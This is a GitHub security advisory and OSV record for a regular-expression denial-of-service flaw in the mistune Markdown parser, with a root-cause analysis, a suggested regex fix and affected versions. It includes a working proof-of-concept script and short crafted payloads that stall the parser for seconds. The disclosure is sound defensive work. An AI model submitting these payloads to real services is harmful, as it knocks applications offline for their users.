GHSA-8MP2-V27R-99XP
Vulnerability from github – Published: 2026-05-06 16:52 – Updated: 2026-05-06 19:35Summary
A ReDoS (Regular Expression Denial of Service) vulnerability in LINK_TITLE_RE allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.
Details
The vulnerable regex is defined in src/mistune/helpers.py#L20-L25:
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|' # "title"
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'" # 'title'
r")"
)
The double-quote branch compiles to "(?:\\[PUNCTUATION]|[^"\x00])*". The two alternatives inside (A|B)* overlap: a backslash followed by a punctuation character (e.g. \!) can be matched by either branch — as a 2-character escaped-punctuation sequence \\!, or as two individual [^"\x00] characters (\ then !). The same ambiguity exists in the single-quoted title branch.
When the input contains repeated \! pairs with no closing ", the regex engine exhaustively backtracks through all 2^N combinations, resulting in exponential O(2^N) time complexity.
This is reachable through normal Markdown parsing via two code paths:
1. Inline links: [text](url "PAYLOAD) → parse_link() → parse_link_title()
2. Block link reference definitions: [label]: url "PAYLOAD → BlockParser.parse_ref_link() → parse_link_title() at block_parser.py#L259
PoC
import mistune
import time
md = mistune.create_markdown()
# Test with increasing N (number of \! pairs)
for n in [15, 18, 20, 22, 25]:
payload = '[x](y "' + '\\!' * n + ')'
start = time.time()
md(payload)
elapsed = time.time() - start
print(f"N={n:2d} len={len(payload):3d} bytes time={elapsed:.3f}s")
Output (Apple M2, Python 3.14.3, mistune 3.2.0):
N=15 len= 38 bytes time=0.007s
N=18 len= 44 bytes time=0.044s
N=20 len= 48 bytes time=0.178s
N=22 len= 52 bytes time=0.740s
N=25 len= 58 bytes time=5.922s
Each increment of N roughly doubles the execution time (consistent with O(2^N)).
The same attack works via block link reference definitions:
payload = '[l]: u "' + '\\!' * 25 # 58 bytes, ~6 seconds
md(payload)
Impact
This is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).
Affected use cases include: - Web applications with Markdown-enabled input fields (comments, posts, descriptions) - Documentation systems that accept user contributions - API endpoints that process Markdown - Jupyter tooling such as nbconvert that relies on mistune for rendering
Suggested Fix
Exclude the backslash character from the catch-all character class to eliminate the alternation overlap:
# Before (vulnerable):
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"
# After (fixed):
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"
This ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3): - Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement) - Handles N=50 in 0.000008 seconds - Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.0"
},
"package": {
"ecosystem": "PyPI",
"name": "mistune"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0a1"
},
{
"fixed": "3.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33079"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T16:52:43Z",
"nvd_published_at": "2026-05-06T18:16:03Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.\n\n### Details\n\nThe vulnerable regex is defined in [`src/mistune/helpers.py#L20-L25`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25):\n\n```python\nLINK_TITLE_RE = re.compile(\n r\"[ \\t\\n]+(\"\n r\u0027\"(?:\\\\\u0027 + PUNCTUATION + r\u0027|[^\"\\x00])*\"|\u0027 # \"title\"\n r\"\u0027(?:\\\\\" + PUNCTUATION + r\"|[^\u0027\\x00])*\u0027\" # \u0027title\u0027\n r\")\"\n)\n```\n\nThe double-quote branch compiles to `\"(?:\\\\[PUNCTUATION]|[^\"\\x00])*\"`. The two alternatives inside `(A|B)*` overlap: a backslash followed by a punctuation character (e.g. `\\!`) can be matched by **either** branch \u2014 as a 2-character escaped-punctuation sequence `\\\\!`, or as two individual `[^\"\\x00]` characters (`\\` then `!`). The same ambiguity exists in the single-quoted title branch.\n\nWhen the input contains repeated `\\!` pairs with no closing `\"`, the regex engine exhaustively backtracks through all 2^N combinations, resulting in **exponential O(2^N) time complexity**.\n\nThis is reachable through normal Markdown parsing via two code paths:\n1. **Inline links**: `[text](url \"PAYLOAD)` \u2192 [`parse_link()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L178) \u2192 [`parse_link_title()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L169)\n2. **Block link reference definitions**: `[label]: url \"PAYLOAD` \u2192 [`BlockParser.parse_ref_link()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/block_parser.py#L220) \u2192 [`parse_link_title()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L169) at [block_parser.py#L259](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/block_parser.py#L259)\n\n### PoC\n\n```python\nimport mistune\nimport time\n\nmd = mistune.create_markdown()\n\n# Test with increasing N (number of \\! pairs)\nfor n in [15, 18, 20, 22, 25]:\n payload = \u0027[x](y \"\u0027 + \u0027\\\\!\u0027 * n + \u0027)\u0027\n start = time.time()\n md(payload)\n elapsed = time.time() - start\n print(f\"N={n:2d} len={len(payload):3d} bytes time={elapsed:.3f}s\")\n```\n\nOutput (Apple M2, Python 3.14.3, mistune 3.2.0):\n\n```\nN=15 len= 38 bytes time=0.007s\nN=18 len= 44 bytes time=0.044s\nN=20 len= 48 bytes time=0.178s\nN=22 len= 52 bytes time=0.740s\nN=25 len= 58 bytes time=5.922s\n```\n\nEach increment of N roughly doubles the execution time (consistent with O(2^N)).\n\nThe same attack works via block link reference definitions:\n\n```python\npayload = \u0027[l]: u \"\u0027 + \u0027\\\\!\u0027 * 25 # 58 bytes, ~6 seconds\nmd(payload)\n```\n\n### Impact\n\nThis is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).\n\nAffected use cases include:\n- Web applications with Markdown-enabled input fields (comments, posts, descriptions)\n- Documentation systems that accept user contributions\n- API endpoints that process Markdown\n- Jupyter tooling such as nbconvert that relies on mistune for rendering\n\n### Suggested Fix\n\nExclude the backslash character from the catch-all character class to eliminate the alternation overlap:\n\n```python\n# Before (vulnerable):\nr\u0027\"(?:\\\\\u0027 + PUNCTUATION + r\u0027|[^\"\\x00])*\"\u0027\nr\"\u0027(?:\\\\\" + PUNCTUATION + r\"|[^\u0027\\x00])*\u0027\"\n\n# After (fixed):\nr\u0027\"(?:\\\\\u0027 + PUNCTUATION + r\u0027|[^\"\\\\\\x00])*\"\u0027\nr\"\u0027(?:\\\\\" + PUNCTUATION + r\"|[^\u0027\\\\\\x00])*\u0027\"\n```\n\nThis ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3):\n- Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement)\n- Handles N=50 in 0.000008 seconds\n- Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)",
"id": "GHSA-8mp2-v27r-99xp",
"modified": "2026-05-06T19:35:51Z",
"published": "2026-05-06T16:52:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33079"
},
{
"type": "PACKAGE",
"url": "https://github.com/lepture/mistune"
},
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.